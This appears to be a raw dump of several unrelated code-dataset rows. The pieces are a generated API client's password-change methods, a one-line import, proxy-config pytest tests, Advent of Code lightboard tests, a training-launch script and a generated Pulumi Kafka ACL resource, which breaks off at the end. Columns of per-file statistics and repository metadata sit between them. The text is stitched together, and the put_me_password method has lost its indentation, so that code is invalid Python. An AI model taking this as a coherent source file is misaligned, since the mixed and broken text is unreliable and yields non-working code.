        # Authentication setting: password changes use HTTP Basic auth.
        auth_settings = ['BasicAuthentication']  # noqa: E501
        # urlopen optional setting; read from the untouched original kwargs
        # (only the locals snapshot was mutated above).
        urlopen_kw = None
        if 'urlopen_kw' in kwargs:
            urlopen_kw = kwargs['urlopen_kw']
        return self.api_client.call_api(
            '/api/v2/users/{userID}/password', 'POST',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type=None,  # noqa: E501
            auth_settings=auth_settings,
            async_req=local_var_params.get('async_req'),
            _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
            _preload_content=local_var_params.get('_preload_content', True),
            _request_timeout=local_var_params.get('_request_timeout'),
            collection_formats=collection_formats,
            urlopen_kw=urlopen_kw)
def put_me_password(self, password_reset_body, **kwargs): # noqa: E501,D401,D403
"""Update a password.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.put_me_password(password_reset_body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param PasswordResetBody password_reset_body: New password (required)
:param str zap_trace_span: OpenTracing span context
:param str authorization: An auth credential for the Basic scheme
:return: None
If the method is called asynchronously,
returns the request thread.
""" # noqa: E501
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.put_me_password_with_http_info(password_reset_body, **kwargs) # noqa: E501
else:
(data) = self.put_me_password_with_http_info(password_reset_body, **kwargs) # noqa: E501
return data
    def put_me_password_with_http_info(self, password_reset_body, **kwargs):  # noqa: E501,D401,D403
        """Update a password.

        Low-level variant of ``put_me_password``: returns the full response
        (data, status, headers) unless ``_return_http_data_only`` is set.
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.put_me_password_with_http_info(password_reset_body, async_req=True)
        >>> result = thread.get()
        :param async_req bool
        :param PasswordResetBody password_reset_body: New password (required)
        :param str zap_trace_span: OpenTracing span context
        :param str authorization: An auth credential for the Basic scheme
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """  # noqa: E501
        # Snapshot of the local frame, taken while it holds only ``self``,
        # ``password_reset_body`` and the raw ``kwargs`` dict; accepted
        # keywords are merged into it below.
        local_var_params = locals()
        # Endpoint-specific parameters, then framework-level options shared by
        # every generated wrapper.
        all_params = ['password_reset_body', 'zap_trace_span', 'authorization']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')
        all_params.append('urlopen_kw')
        # Reject unknown keyword arguments early; fold known ones into the
        # locals snapshot so downstream code can look them up uniformly.
        for key, val in six.iteritems(local_var_params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method put_me_password" % key
                )
            local_var_params[key] = val
        del local_var_params['kwargs']
        # verify the required parameter 'password_reset_body' is set
        if ('password_reset_body' not in local_var_params or
                local_var_params['password_reset_body'] is None):
            raise ValueError("Missing the required parameter `password_reset_body` when calling `put_me_password`")  # noqa: E501
        collection_formats = {}
        path_params = {}
        query_params = []
        header_params = {}
        if 'zap_trace_span' in local_var_params:
            header_params['Zap-Trace-Span'] = local_var_params['zap_trace_span']  # noqa: E501
        # An explicit Authorization header may override the configured auth.
        if 'authorization' in local_var_params:
            header_params['Authorization'] = local_var_params['authorization']  # noqa: E501
        form_params = []
        local_var_files = {}
        # The PasswordResetBody model is sent as the JSON request body.
        body_params = None
        if 'password_reset_body' in local_var_params:
            body_params = local_var_params['password_reset_body']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501
        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501
        # Authentication setting: password changes use HTTP Basic auth.
        auth_settings = ['BasicAuthentication']  # noqa: E501
        # urlopen optional setting; read from the untouched original kwargs
        # (only the locals snapshot was mutated above).
        urlopen_kw = None
        if 'urlopen_kw' in kwargs:
            urlopen_kw = kwargs['urlopen_kw']
        return self.api_client.call_api(
            '/api/v2/me/password', 'PUT',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type=None,  # noqa: E501
            auth_settings=auth_settings,
            async_req=local_var_params.get('async_req'),
            _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
            _preload_content=local_var_params.get('_preload_content', True),
            _request_timeout=local_var_params.get('_request_timeout'),
            collection_formats=collection_formats,
            urlopen_kw=urlopen_kw)
| 40.608696
| 159
| 0.619963
| 4,998
| 41,096
| 4.796519
| 0.040816
| 0.053393
| 0.082927
| 0.02703
| 0.961498
| 0.958662
| 0.955992
| 0.946607
| 0.935386
| 0.930338
| 0
| 0.019665
| 0.290977
| 41,096
| 1,011
| 160
| 40.648863
| 0.803075
| 0.302171
| 0
| 0.818505
| 0
| 0.005338
| 0.189234
| 0.030102
| 0
| 0
| 0
| 0
| 0
| 1
| 0.033808
| false
| 0.044484
| 0.005338
| 0
| 0.088968
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
81582e4396b3cbf99fad45a556d5af1b836029d4
| 42
|
py
|
Python
|
charq/__init_.py
|
EmidioLP/CharQ
|
7fb857c4481458ce5d09741d78bf0513d44af130
|
[
"MIT"
] | null | null | null |
charq/__init_.py
|
EmidioLP/CharQ
|
7fb857c4481458ce5d09741d78bf0513d44af130
|
[
"MIT"
] | 1
|
2021-03-16T19:11:36.000Z
|
2021-03-16T19:12:18.000Z
|
charq/__init_.py
|
EmidioLP/CharQ
|
7fb857c4481458ce5d09741d78bf0513d44af130
|
[
"MIT"
] | 2
|
2021-03-16T19:03:43.000Z
|
2021-03-16T20:10:11.000Z
|
from charq import CharAscii, WordGenerate
| 21
| 41
| 0.857143
| 5
| 42
| 7.2
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.119048
| 42
| 1
| 42
| 42
| 0.972973
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
8169141dd580a2964c05f0d816b17d0367d761e2
| 2,001
|
py
|
Python
|
docker/tests/test_merge_config.py
|
OlegBravo/tf-charms
|
4b05c5bb82446b5625aa8fd1efc7f69c8962b62b
|
[
"Apache-2.0"
] | null | null | null |
docker/tests/test_merge_config.py
|
OlegBravo/tf-charms
|
4b05c5bb82446b5625aa8fd1efc7f69c8962b62b
|
[
"Apache-2.0"
] | null | null | null |
docker/tests/test_merge_config.py
|
OlegBravo/tf-charms
|
4b05c5bb82446b5625aa8fd1efc7f69c8962b62b
|
[
"Apache-2.0"
] | null | null | null |
import pytest
from lib.charms.layer.container_runtime_common import (
merge_config
)
def test_get_hosts():
CONFIG = {
'NO_PROXY': '192.168.2.1, 192.168.2.0/29, hello.com',
'https_proxy': 'https://hop.proxy',
'HTTP_PROXY': '',
}
ENVIRONMENT = {
'HTTPS_PROXY': 'https://proxy.hop',
'HTTP_PROXY': 'http://proxy.hop',
'no_proxy': 'not tha proxy'
}
merged = merge_config(CONFIG, ENVIRONMENT)
assert merged == {
'NO_PROXY': '192.168.2.1, 192.168.2.0/29, hello.com',
'HTTPS_PROXY': 'https://hop.proxy',
'HTTP_PROXY': 'http://proxy.hop',
'no_proxy': '192.168.2.1, 192.168.2.0/29, hello.com',
'https_proxy': 'https://hop.proxy',
'http_proxy': 'http://proxy.hop'
}
def test_get_hosts_no_local_conf():
CONFIG = {
'NO_PROXY': '',
'https_proxy': '',
'HTTP_PROXY': '',
}
ENVIRONMENT = {
'HTTPS_PROXY': 'https://proxy.hop',
'HTTP_PROXY': 'http://proxy.hop',
'no_proxy': 'not tha proxy'
}
merged = merge_config(CONFIG, ENVIRONMENT)
assert merged == {
'HTTPS_PROXY': 'https://proxy.hop',
'HTTP_PROXY': 'http://proxy.hop',
'NO_PROXY': 'not tha proxy',
'https_proxy': 'https://proxy.hop',
'http_proxy': 'http://proxy.hop',
'no_proxy': 'not tha proxy'
}
def test_get_hosts_no_env_conf():
ENVIRONMENT = {
'NO_PROXY': '',
'HTTPS_PROXY': '',
'HTTP_PROXY': '',
}
CONFIG = {
'HTTPS_PROXY': 'https://proxy.hop',
'HTTP_PROXY': 'http://proxy.hop',
'no_proxy': 'not tha proxy'
}
merged = merge_config(CONFIG, ENVIRONMENT)
assert merged == {
'HTTPS_PROXY': 'https://proxy.hop',
'HTTP_PROXY': 'http://proxy.hop',
'NO_PROXY': 'not tha proxy',
'no_proxy': 'not tha proxy',
'https_proxy': 'https://proxy.hop',
'http_proxy': 'http://proxy.hop',
}
| 25.653846
| 61
| 0.54073
| 240
| 2,001
| 4.283333
| 0.15
| 0.183852
| 0.190661
| 0.157588
| 0.874514
| 0.84144
| 0.804475
| 0.804475
| 0.804475
| 0.804475
| 0
| 0.037113
| 0.272864
| 2,001
| 77
| 62
| 25.987013
| 0.669416
| 0
| 0
| 0.65625
| 0
| 0.046875
| 0.433283
| 0
| 0
| 0
| 0
| 0
| 0.046875
| 1
| 0.046875
| false
| 0
| 0.03125
| 0
| 0.078125
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8176e753ed558bb763c9a9bcd3ce4e228bdb9a8c
| 3,698
|
py
|
Python
|
AdventOfCode/Day18_tests.py
|
btrzcinski/AdventOfCode
|
46012e81ba8a56cde811ad481ab14b43ce73f09f
|
[
"MIT"
] | null | null | null |
AdventOfCode/Day18_tests.py
|
btrzcinski/AdventOfCode
|
46012e81ba8a56cde811ad481ab14b43ce73f09f
|
[
"MIT"
] | null | null | null |
AdventOfCode/Day18_tests.py
|
btrzcinski/AdventOfCode
|
46012e81ba8a56cde811ad481ab14b43ce73f09f
|
[
"MIT"
] | null | null | null |
import unittest
import Day18
class Day18_tests(unittest.TestCase):
def test_lightboard_neighbors(self):
l = Day18.Lightboard(6)
l[3,3] = 1
for point in [(2,2), (2, 3), (2, 4), (3, 2), (3, 4), (4, 2), (4, 3), (4, 4)]:
self.assertEqual(1, l.neighbors_on_for_light(point))
def test_example(self):
l = Day18.Lightboard(6)
l[0,1] = 1
l[0,3] = 1
l[0,5] = 1
l[1,3] = 1
l[1,4] = 1
l[2,0] = 1
l[2,5] = 1
l[3,2] = 1
l[4,0] = 1
l[4,2] = 1
l[4,5] = 1
l[5,0] = 1
l[5,1] = 1
l[5,2] = 1
l[5,3] = 1
self.assertEqual(".#.#.#\n...##.\n#....#\n..#...\n#.#..#\n####..", repr(l))
l.iterate()
self.assertEqual("..##..\n..##.#\n...##.\n......\n#.....\n#.##..", repr(l))
l.iterate()
self.assertEqual("..###.\n......\n..###.\n......\n.#....\n.#....", repr(l))
l.iterate()
self.assertEqual("...#..\n......\n...#..\n..##..\n......\n......", repr(l))
l.iterate()
self.assertEqual("......\n......\n..##..\n..##..\n......\n......", repr(l))
def test_example_with_stuck_corners(self):
l = Day18.Lightboard(6)
l[0,0] = 1
l[0,1] = 1
l[0,3] = 1
l[0,5] = 1
l[1,3] = 1
l[1,4] = 1
l[2,0] = 1
l[2,5] = 1
l[3,2] = 1
l[4,0] = 1
l[4,2] = 1
l[4,5] = 1
l[5,0] = 1
l[5,1] = 1
l[5,2] = 1
l[5,3] = 1
l[5,5] = 1
self.assertEqual("##.#.#\n...##.\n#....#\n..#...\n#.#..#\n####.#", repr(l))
l.iterate(corners_always_on=True)
self.assertEqual("#.##.#\n####.#\n...##.\n......\n#...#.\n#.####", repr(l))
l.iterate(corners_always_on=True)
self.assertEqual("#..#.#\n#....#\n.#.##.\n...##.\n.#..##\n##.###", repr(l))
l.iterate(corners_always_on=True)
self.assertEqual("#...##\n####.#\n..##.#\n......\n##....\n####.#", repr(l))
l.iterate(corners_always_on=True)
self.assertEqual("#.####\n#....#\n...#..\n.##...\n#.....\n#.#..#", repr(l))
l.iterate(corners_always_on=True)
self.assertEqual("##.###\n.##..#\n.##...\n.##...\n#.#...\n##...#", repr(l))
self.assertEqual(17, l.number_of_lights_on())
def test_example_with_stuck_corners_2(self):
l = Day18.Lightboard(6)
l[0,0] = 1
l[0,1] = 1
l[0,3] = 1
l[0,5] = 1
l[1,3] = 1
l[1,4] = 1
l[2,0] = 1
l[2,5] = 1
l[3,2] = 1
l[4,0] = 1
l[4,2] = 1
l[4,5] = 1
l[5,0] = 1
l[5,1] = 1
l[5,2] = 1
l[5,3] = 1
l[5,5] = 1
self.assertEqual("##.#.#\n...##.\n#....#\n..#...\n#.#..#\n####.#", repr(l))
l.iterate(n=5, corners_always_on=True)
self.assertEqual("##.###\n.##..#\n.##...\n.##...\n#.#...\n##...#", repr(l))
self.assertEqual(17, l.number_of_lights_on())
def test_example_with_stuck_corners_3(self):
l = Day18.Lightboard(6)
l[0,1] = 1
l[0,3] = 1
l[0,5] = 1
l[1,3] = 1
l[1,4] = 1
l[2,0] = 1
l[2,5] = 1
l[3,2] = 1
l[4,0] = 1
l[4,2] = 1
l[4,5] = 1
l[5,0] = 1
l[5,1] = 1
l[5,2] = 1
l[5,3] = 1
self.assertEqual(".#.#.#\n...##.\n#....#\n..#...\n#.#..#\n####..", repr(l))
l.iterate(n=5, corners_always_on=True)
self.assertEqual("##.###\n.##..#\n.##...\n.##...\n#.#...\n##...#", repr(l))
self.assertEqual(17, l.number_of_lights_on())
if __name__ == "__main__":
unittest.main(verbosity=2)
| 31.07563
| 85
| 0.380206
| 569
| 3,698
| 2.379613
| 0.073814
| 0.090103
| 0.099705
| 0.088626
| 0.85229
| 0.85229
| 0.813885
| 0.813885
| 0.813885
| 0.813885
| 0
| 0.094716
| 0.309086
| 3,698
| 118
| 86
| 31.338983
| 0.435225
| 0
| 0
| 0.810811
| 0
| 0
| 0.188751
| 0.186587
| 0
| 0
| 0
| 0
| 0.171171
| 1
| 0.045045
| false
| 0
| 0.018018
| 0
| 0.072072
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
819d31d4b9fccf11ef441015552aeaed172ce3da
| 540
|
py
|
Python
|
train_mosmed_timm-regnetx_002_posterize.py
|
BrunoKrinski/segtool
|
cb604b5f38104c43a76450136e37c3d1c4b6d275
|
[
"MIT"
] | null | null | null |
train_mosmed_timm-regnetx_002_posterize.py
|
BrunoKrinski/segtool
|
cb604b5f38104c43a76450136e37c3d1c4b6d275
|
[
"MIT"
] | null | null | null |
train_mosmed_timm-regnetx_002_posterize.py
|
BrunoKrinski/segtool
|
cb604b5f38104c43a76450136e37c3d1c4b6d275
|
[
"MIT"
] | null | null | null |
import os
ls=["python main.py --configs configs/train_mosmed_unetplusplus_timm-regnetx_002_fold0_posterize.yml",
"python main.py --configs configs/train_mosmed_unetplusplus_timm-regnetx_002_fold1_posterize.yml",
"python main.py --configs configs/train_mosmed_unetplusplus_timm-regnetx_002_fold2_posterize.yml",
"python main.py --configs configs/train_mosmed_unetplusplus_timm-regnetx_002_fold3_posterize.yml",
"python main.py --configs configs/train_mosmed_unetplusplus_timm-regnetx_002_fold4_posterize.yml",
]
for l in ls:
os.system(l)
| 49.090909
| 102
| 0.846296
| 80
| 540
| 5.3375
| 0.3
| 0.117096
| 0.140515
| 0.222482
| 0.850117
| 0.850117
| 0.850117
| 0.850117
| 0.850117
| 0.850117
| 0
| 0.039293
| 0.057407
| 540
| 11
| 103
| 49.090909
| 0.799607
| 0
| 0
| 0
| 0
| 0
| 0.878004
| 0.64695
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.111111
| 0
| 0.111111
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
c4afee20912d4f3ccdb0481399a4c02d1db91ea0
| 16,792
|
py
|
Python
|
sdk/python/pulumi_aiven/kafka_acl.py
|
pulumi/pulumi-aiven
|
0d330ef43c17ce2d2a77588c1d9754de6c8ca736
|
[
"ECL-2.0",
"Apache-2.0"
] | 7
|
2019-11-28T22:30:11.000Z
|
2021-12-27T16:40:54.000Z
|
sdk/python/pulumi_aiven/kafka_acl.py
|
pulumi/pulumi-aiven
|
0d330ef43c17ce2d2a77588c1d9754de6c8ca736
|
[
"ECL-2.0",
"Apache-2.0"
] | 97
|
2019-12-17T09:58:57.000Z
|
2022-03-31T15:19:02.000Z
|
sdk/python/pulumi_aiven/kafka_acl.py
|
pulumi/pulumi-aiven
|
0d330ef43c17ce2d2a77588c1d9754de6c8ca736
|
[
"ECL-2.0",
"Apache-2.0"
] | 1
|
2020-11-24T12:22:38.000Z
|
2020-11-24T12:22:38.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
__all__ = ['KafkaAclArgs', 'KafkaAcl']
@pulumi.input_type
class KafkaAclArgs:
    # tfgen-generated input bag for the KafkaAcl resource.  The
    # @pulumi.input_type decorator rewrites this class based on the exact
    # property/setter pairs below, and values live in pulumi's internal
    # property map (pulumi.set / pulumi.get), not in instance attributes —
    # keep the structure exactly as generated.
    def __init__(__self__, *,
                 permission: pulumi.Input[str],
                 project: pulumi.Input[str],
                 service_name: pulumi.Input[str],
                 topic: pulumi.Input[str],
                 username: pulumi.Input[str]):
        """
        The set of arguments for constructing a KafkaAcl resource.
        :param pulumi.Input[str] permission: is the level of permission the matching users are given to the matching
               topics (admin, read, readwrite, write).
        :param pulumi.Input[str] project: and `service_name` - (Required) define the project and service the ACL belongs to.
               They should be defined using reference as shown above to set up dependencies correctly.
               These properties cannot be changed once the service is created. Doing so will result in
               the topic being deleted and new one created instead.
        :param pulumi.Input[str] service_name: Service to link the Kafka ACL to
        :param pulumi.Input[str] topic: is a topic name pattern the ACL entry matches to.
        :param pulumi.Input[str] username: is a username pattern the ACL entry matches to.
        """
        # All five inputs are required at construction time.
        pulumi.set(__self__, "permission", permission)
        pulumi.set(__self__, "project", project)
        pulumi.set(__self__, "service_name", service_name)
        pulumi.set(__self__, "topic", topic)
        pulumi.set(__self__, "username", username)
    @property
    @pulumi.getter
    def permission(self) -> pulumi.Input[str]:
        """
        is the level of permission the matching users are given to the matching
        topics (admin, read, readwrite, write).
        """
        return pulumi.get(self, "permission")
    @permission.setter
    def permission(self, value: pulumi.Input[str]):
        pulumi.set(self, "permission", value)
    @property
    @pulumi.getter
    def project(self) -> pulumi.Input[str]:
        """
        and `service_name` - (Required) define the project and service the ACL belongs to.
        They should be defined using reference as shown above to set up dependencies correctly.
        These properties cannot be changed once the service is created. Doing so will result in
        the topic being deleted and new one created instead.
        """
        return pulumi.get(self, "project")
    @project.setter
    def project(self, value: pulumi.Input[str]):
        pulumi.set(self, "project", value)
    # NOTE: the wire-level name is camelCase ("serviceName"); pulumi maps it
    # to the snake_case Python property via @pulumi.getter(name=...).
    @property
    @pulumi.getter(name="serviceName")
    def service_name(self) -> pulumi.Input[str]:
        """
        Service to link the Kafka ACL to
        """
        return pulumi.get(self, "service_name")
    @service_name.setter
    def service_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "service_name", value)
    @property
    @pulumi.getter
    def topic(self) -> pulumi.Input[str]:
        """
        is a topic name pattern the ACL entry matches to.
        """
        return pulumi.get(self, "topic")
    @topic.setter
    def topic(self, value: pulumi.Input[str]):
        pulumi.set(self, "topic", value)
    @property
    @pulumi.getter
    def username(self) -> pulumi.Input[str]:
        """
        is a username pattern the ACL entry matches to.
        """
        return pulumi.get(self, "username")
    @username.setter
    def username(self, value: pulumi.Input[str]):
        pulumi.set(self, "username", value)
@pulumi.input_type
class _KafkaAclState:
    # tfgen-generated state bag used by KafkaAcl.get().  Unlike
    # KafkaAclArgs, every field is Optional because this class only
    # describes filters / known state of an *existing* resource.
    def __init__(__self__, *,
                 permission: Optional[pulumi.Input[str]] = None,
                 project: Optional[pulumi.Input[str]] = None,
                 service_name: Optional[pulumi.Input[str]] = None,
                 topic: Optional[pulumi.Input[str]] = None,
                 username: Optional[pulumi.Input[str]] = None):
        """
        Input properties used for looking up and filtering KafkaAcl resources.
        :param pulumi.Input[str] permission: is the level of permission the matching users are given to the matching
               topics (admin, read, readwrite, write).
        :param pulumi.Input[str] project: and `service_name` - (Required) define the project and service the ACL belongs to.
               They should be defined using reference as shown above to set up dependencies correctly.
               These properties cannot be changed once the service is created. Doing so will result in
               the topic being deleted and new one created instead.
        :param pulumi.Input[str] service_name: Service to link the Kafka ACL to
        :param pulumi.Input[str] topic: is a topic name pattern the ACL entry matches to.
        :param pulumi.Input[str] username: is a username pattern the ACL entry matches to.
        """
        # Only store properties that were actually provided, so unset fields
        # stay absent from the underlying property map.
        if permission is not None:
            pulumi.set(__self__, "permission", permission)
        if project is not None:
            pulumi.set(__self__, "project", project)
        if service_name is not None:
            pulumi.set(__self__, "service_name", service_name)
        if topic is not None:
            pulumi.set(__self__, "topic", topic)
        if username is not None:
            pulumi.set(__self__, "username", username)
    @property
    @pulumi.getter
    def permission(self) -> Optional[pulumi.Input[str]]:
        """
        is the level of permission the matching users are given to the matching
        topics (admin, read, readwrite, write).
        """
        return pulumi.get(self, "permission")
    @permission.setter
    def permission(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "permission", value)
    @property
    @pulumi.getter
    def project(self) -> Optional[pulumi.Input[str]]:
        """
        and `service_name` - (Required) define the project and service the ACL belongs to.
        They should be defined using reference as shown above to set up dependencies correctly.
        These properties cannot be changed once the service is created. Doing so will result in
        the topic being deleted and new one created instead.
        """
        return pulumi.get(self, "project")
    @project.setter
    def project(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "project", value)
    # NOTE: wire name is camelCase ("serviceName"); mapped via @pulumi.getter(name=...).
    @property
    @pulumi.getter(name="serviceName")
    def service_name(self) -> Optional[pulumi.Input[str]]:
        """
        Service to link the Kafka ACL to
        """
        return pulumi.get(self, "service_name")
    @service_name.setter
    def service_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "service_name", value)
    @property
    @pulumi.getter
    def topic(self) -> Optional[pulumi.Input[str]]:
        """
        is a topic name pattern the ACL entry matches to.
        """
        return pulumi.get(self, "topic")
    @topic.setter
    def topic(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "topic", value)
    @property
    @pulumi.getter
    def username(self) -> Optional[pulumi.Input[str]]:
        """
        is a username pattern the ACL entry matches to.
        """
        return pulumi.get(self, "username")
    @username.setter
    def username(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "username", value)
# tfgen-generated resource wrapper for 'aiven:index/kafkaAcl:KafkaAcl'.
class KafkaAcl(pulumi.CustomResource):
    @overload
    def __init__(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 permission: Optional[pulumi.Input[str]] = None,
                 project: Optional[pulumi.Input[str]] = None,
                 service_name: Optional[pulumi.Input[str]] = None,
                 topic: Optional[pulumi.Input[str]] = None,
                 username: Optional[pulumi.Input[str]] = None,
                 __props__=None):
        """
        ## # Resource Kafka ACL Resource
        The Resource Kafka ACL resource allows the creation and management of ACLs for an Aiven Kafka service.
        ## Example Usage
        ```python
        import pulumi
        import pulumi_aiven as aiven
        mytestacl = aiven.KafkaAcl("mytestacl",
            project=aiven_project["myproject"]["project"],
            service_name=aiven_kafka["myservice"]["service_name"],
            topic="<TOPIC_NAME_PATTERN>",
            permission="admin",
            username="<USERNAME_PATTERN>")
        ```
        :param str resource_name: The name of the resource.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] permission: is the level of permission the matching users are given to the matching
               topics (admin, read, readwrite, write).
        :param pulumi.Input[str] project: and `service_name` - (Required) define the project and service the ACL belongs to.
               They should be defined using reference as shown above to set up dependencies correctly.
               These properties cannot be changed once the service is created. Doing so will result in
               the topic being deleted and new one created instead.
        :param pulumi.Input[str] service_name: Service to link the Kafka ACL to
        :param pulumi.Input[str] topic: is a topic name pattern the ACL entry matches to.
        :param pulumi.Input[str] username: is a username pattern the ACL entry matches to.
        """
        ...
    @overload
    def __init__(__self__,
                 resource_name: str,
                 args: KafkaAclArgs,
                 opts: Optional[pulumi.ResourceOptions] = None):
        """
        ## # Resource Kafka ACL Resource
        The Resource Kafka ACL resource allows the creation and management of ACLs for an Aiven Kafka service.
        ## Example Usage
        ```python
        import pulumi
        import pulumi_aiven as aiven
        mytestacl = aiven.KafkaAcl("mytestacl",
            project=aiven_project["myproject"]["project"],
            service_name=aiven_kafka["myservice"]["service_name"],
            topic="<TOPIC_NAME_PATTERN>",
            permission="admin",
            username="<USERNAME_PATTERN>")
        ```
        :param str resource_name: The name of the resource.
        :param KafkaAclArgs args: The arguments to use to populate this resource's properties.
        :param pulumi.ResourceOptions opts: Options for the resource.
        """
        ...
    # Runtime dispatcher for the two @overload signatures above: detects
    # whether the caller passed a KafkaAclArgs bag or bare keyword args.
    def __init__(__self__, resource_name: str, *args, **kwargs):
        resource_args, opts = _utilities.get_resource_args_opts(KafkaAclArgs, pulumi.ResourceOptions, *args, **kwargs)
        if resource_args is not None:
            __self__._internal_init(resource_name, opts, **resource_args.__dict__)
        else:
            __self__._internal_init(resource_name, *args, **kwargs)
    def _internal_init(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 permission: Optional[pulumi.Input[str]] = None,
                 project: Optional[pulumi.Input[str]] = None,
                 service_name: Optional[pulumi.Input[str]] = None,
                 topic: Optional[pulumi.Input[str]] = None,
                 username: Optional[pulumi.Input[str]] = None,
                 __props__=None):
        # Shared implementation behind both constructor overloads.
        if opts is None:
            opts = pulumi.ResourceOptions()
        if not isinstance(opts, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        if opts.version is None:
            opts.version = _utilities.get_version()
        # opts.id is only set when adopting an existing resource (via get());
        # a plain create must build a fresh props bag and enforce required inputs.
        if opts.id is None:
            if __props__ is not None:
                raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
            __props__ = KafkaAclArgs.__new__(KafkaAclArgs)
            # Inputs may legitimately be omitted when rehydrating from a URN.
            if permission is None and not opts.urn:
                raise TypeError("Missing required property 'permission'")
            __props__.__dict__["permission"] = permission
            if project is None and not opts.urn:
                raise TypeError("Missing required property 'project'")
            __props__.__dict__["project"] = project
            if service_name is None and not opts.urn:
                raise TypeError("Missing required property 'service_name'")
            __props__.__dict__["service_name"] = service_name
            if topic is None and not opts.urn:
                raise TypeError("Missing required property 'topic'")
            __props__.__dict__["topic"] = topic
            if username is None and not opts.urn:
                raise TypeError("Missing required property 'username'")
            __props__.__dict__["username"] = username
        super(KafkaAcl, __self__).__init__(
            'aiven:index/kafkaAcl:KafkaAcl',
            resource_name,
            __props__,
            opts)
    @staticmethod
    def get(resource_name: str,
            id: pulumi.Input[str],
            opts: Optional[pulumi.ResourceOptions] = None,
            permission: Optional[pulumi.Input[str]] = None,
            project: Optional[pulumi.Input[str]] = None,
            service_name: Optional[pulumi.Input[str]] = None,
            topic: Optional[pulumi.Input[str]] = None,
            username: Optional[pulumi.Input[str]] = None) -> 'KafkaAcl':
        """
        Get an existing KafkaAcl resource's state with the given name, id, and optional extra
        properties used to qualify the lookup.
        :param str resource_name: The unique name of the resulting resource.
        :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] permission: is the level of permission the matching users are given to the matching
               topics (admin, read, readwrite, write).
        :param pulumi.Input[str] project: and `service_name` - (Required) define the project and service the ACL belongs to.
               They should be defined using reference as shown above to set up dependencies correctly.
               These properties cannot be changed once the service is created. Doing so will result in
               the topic being deleted and new one created instead.
        :param pulumi.Input[str] service_name: Service to link the Kafka ACL to
        :param pulumi.Input[str] topic: is a topic name pattern the ACL entry matches to.
        :param pulumi.Input[str] username: is a username pattern the ACL entry matches to.
        """
        # Forcing opts.id triggers the "adopt existing resource" path in
        # _internal_init (__props__ is passed through unchanged).
        opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
        __props__ = _KafkaAclState.__new__(_KafkaAclState)
        __props__.__dict__["permission"] = permission
        __props__.__dict__["project"] = project
        __props__.__dict__["service_name"] = service_name
        __props__.__dict__["topic"] = topic
